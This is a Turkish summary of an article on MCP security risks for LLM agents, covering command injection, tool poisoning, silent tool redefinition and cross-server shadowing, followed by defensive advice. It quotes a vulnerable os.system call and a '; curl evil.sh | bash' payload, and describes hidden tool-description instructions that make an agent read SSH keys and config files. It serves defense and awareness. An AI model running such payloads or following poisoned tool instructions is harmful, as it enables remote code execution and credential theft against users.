MCP’deki “S” güvenlik anlamına gelir
(medium.com/@elenacross7)- Model Context Protocol (MCP), Claude, GPT ve Cursor gibi LLM ajanlarını araçlara ve verilere bağlayan bir standart olarak öne çıkıyor; ancak temel güvenlik modeli zayıf olduğu için benimsenmesi saldırı yüzeyini bizzat genişletebilir
- Standart API bağlantıları, kalıcı oturumlar, komut çalıştırma ve bağlam paylaşımı kolaylaşırken, rastgele sunuculara bağlanmak shell, secret ve altyapıya uzanan bir yan kanal hâline gelebilir
- Equixly testlerinde MCP sunucu uygulamalarının %43’ten fazlasının güvensiz shell çağrıları içerdiği görüldü; Invariant Labs ise araç açıklamalarına kötü amaçlı talimat saklayan Tool Poisoning Attack konusunu ele aldı
- MCP’de kimlik doğrulama standardı, bağlam şifreleme ve araç bütünlüğü doğrulaması eksik; ayrıca kullanıcıların ajanın gerçekte okuduğu araç talimatlarının tamamını görmesi zor
- Geliştiricilerin girdi doğrulaması ve sürüm sabitleme yapması, platformların meta verileri ve bütünlük hash’lerini göstermesi, kullanıcıların ise rastgele sunuculara bağlantıları ve beklenmedik araç güncellemelerini izlemesi gerekiyor
MCP neden bir saldırı yüzeyi hâline geliyor
- MCP (Model Context Protocol), LLM’lerin araçlar ve verilerle nasıl entegre edildiği için ortaya çıkan yeni bir standarttır ve “AI ajanları için USB-C” olarak anılır
- Ajanlar MCP üzerinden birçok işi standartlaştırılmış biçimde yürütebilir
- Standartlaştırılmış API’lerle araçlara bağlanma
- Kalıcı oturumları sürdürme
- Komut çalıştırma
- İş akışları arasında bağlam paylaşma
- Temel sorun, MCP’nin bir varsayılan güvenlik modeli sunmamasıdır
- Bir ajanı rastgele bir MCP sunucusuna bağlamak, shell, secret ve altyapıya uzanan yan kanallar oluşturabilir
Gündeme gelen gerçek saldırı yöntemleri
-
Komut enjeksiyonu zafiyetleri
- Equixly testlerinde MCP sunucu uygulamalarının %43’ten fazlası güvensiz shell çağrıları içeriyordu
- Örnek kod,
os.system("notify-send " + notification_info['msg'])biçiminde kullanıcı girdisini doğrudan shell komutuna ekliyor - Bir saldırgan MCP araç parametrelerine
"; curl evil.sh | bash"gibi bir payload eklerse, güvenilir ajan üzerinden uzaktan kod çalıştırma mümkün olabilir
-
Tool Poisoning Attack
- Invariant Labs’in ele aldığı saldırı, kötü amaçlı talimatları MCP araç açıklamasının içine gizliyor
- Bu açıklama kullanıcıya görünmüyor, ancak yapay zekaya aynen sunuluyor
- Örnek bir araç, iki sayıyı toplayan bir fonksiyon gibi görünse de açıklamasında
~/.ssh/id_rsave~/.cursor/mcp.jsondosyalarını okuma talimatı içeriyor - Cursor gibi ajanlar bu talimatlara uyabilir
-
Silent Redefinition
- MCP araçları kurulumdan sonra kendi tanımlarını değiştirebilir
- Kullanıcı ilk gün güvenli görünen bir aracı onaylasa bile, araç daha sonra API anahtarlarını saldırgana gönderecek şekilde sessizce değişebilir
- Bu, LLM’in içine taşınmış bir tedarik zinciri sorunu olarak görülebilir
-
Cross-Server Tool Shadowing
- Aynı ajana birden fazla sunucu bağlandığında, kötü niyetli bir sunucu güvenilir sunucuya giden çağrıları ezebilir veya ele geçirebilir
- Olası sonuçlar şunlar olabilir
- Kullanıcıya gönderilmiş gibi görünen e-postaların saldırgana iletilmesi
- Alakasız araçlara gizli mantık eklenmesi
- Fazla dikkat çekmeyen argümanlar üzerinden veri sızıntısının kodlanması
Eksik güvenlik önlemleri ve rollere göre yapılması gerekenler
- MCP’nin mevcut önceliği kolay entegrasyon ve birleşik arayüze daha yakın; şu güvenlik özellikleri eksik
- Kimlik doğrulama standardı yok
- Bağlam şifreleme yok
- Araç bütünlüğünü doğrulama yöntemi yok
- Kullanıcılar, ajanın gördüğü araç talimatlarının tamamını inceleyemiyor ve “bu araç değiştirilmedi” bilgisini doğrulayacak bir mekanizma da bulunmuyor
-
Geliştiriciler
- Girdi doğrulaması kullanın
- MCP sunucusu ve araç sürümlerini sabitleyin
- Araç açıklamalarını temizleyin
-
Platform geliştiricileri
- Tüm araç meta verilerini gösterin
- Sunucu güncellemelerinde bütünlük hash’leri kullanın
- Oturum güvenliğini zorunlu kılın
-
Kullanıcılar
- Rastgele sunuculara bağlanmayın
- Oturum davranışlarını, üretim loglarını izler gibi takip edin
- Beklenmedik araç güncellemelerini gözleyin
ScanMCP.com fikri
- ScanMCP.com üzerinde, bağlı MCP araçlarını denetleyen bir tarayıcı ve gösterge paneli yer alabilir
- Gösterilebilecek unsurlar şunlar
- RCE, araç zehirleme ve oturum sızıntısı gibi riskler
- Kullanıcının gördüğü bilgi ile ajanın gördüğü bilgi arasındaki fark
- Uygun hedef kitle; ajan platformlarının güvenlik ekipleri, yapay zeka altyapısı girişimleri ve güvene önem veren bağımsız araç geliştiricileridir
- MCP güçlü bir yapı; ancak varsayılan güvenlik protokolleri oturmadan önce görünürlük ve kontrol sağlayan araçlara ihtiyaç var
Henüz yorum yok.